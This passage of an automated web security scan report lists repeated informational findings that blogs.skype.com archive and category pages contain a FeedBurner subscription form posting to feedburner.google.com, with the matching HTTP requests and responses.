Host:   http://blogs.skype.com
Path:   /en/2010/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 332415
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.64. http://blogs.skype.com/en/2010/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 292276
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.65. http://blogs.skype.com/en/2010/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:38 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 249793
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.66. http://blogs.skype.com/en/2010/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:36 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 363177
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.67. http://blogs.skype.com/en/2010/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 437288
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.68. http://blogs.skype.com/en/2010/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 585263
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.69. http://blogs.skype.com/en/2010/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:31 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 118021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.70. http://blogs.skype.com/en/2010/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242894
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.71. http://blogs.skype.com/en/2010/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/10/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:29 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 485845
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.72. http://blogs.skype.com/en/2010/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/11/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 545285
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.73. http://blogs.skype.com/en/2010/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/12/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2010/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 414773
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.74. http://blogs.skype.com/en/2011/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/01/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:53 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 485169
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.75. http://blogs.skype.com/en/2011/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/02/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 128365
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.76. http://blogs.skype.com/en/2011/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/03/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:50 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 236737
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.77. http://blogs.skype.com/en/2011/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/04/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:49 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 200715
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.78. http://blogs.skype.com/en/2011/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 202770
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.79. http://blogs.skype.com/en/2011/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:46 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 163214
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.80. http://blogs.skype.com/en/2011/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 109054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.81. http://blogs.skype.com/en/2011/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:44 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 156054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.82. http://blogs.skype.com/en/2011/08/using_skype_from_your_home_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/08/using_skype_from_your_home_phone.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/08/using_skype_from_your_home_phone.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 65611
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.83. http://blogs.skype.com/en/2011/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:42 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61636
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.84. http://blogs.skype.com/en/2011/09/introducing_skypesupport_on_tw.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/09/introducing_skypesupport_on_tw.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2011/09/introducing_skypesupport_on_tw.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61925
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.85. http://blogs.skype.com/en/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/advertising/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/advertising/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 80983
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.86. http://blogs.skype.com/en/android/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/android/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/android/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 104201
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.87. http://blogs.skype.com/en/apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/apps/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/apps/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:58 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 240757
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.88. http://blogs.skype.com/en/blackberry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/blackberry/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/blackberry/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:59 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 67973
Connection: close
Content-Type: text/html; charset=UTF-8

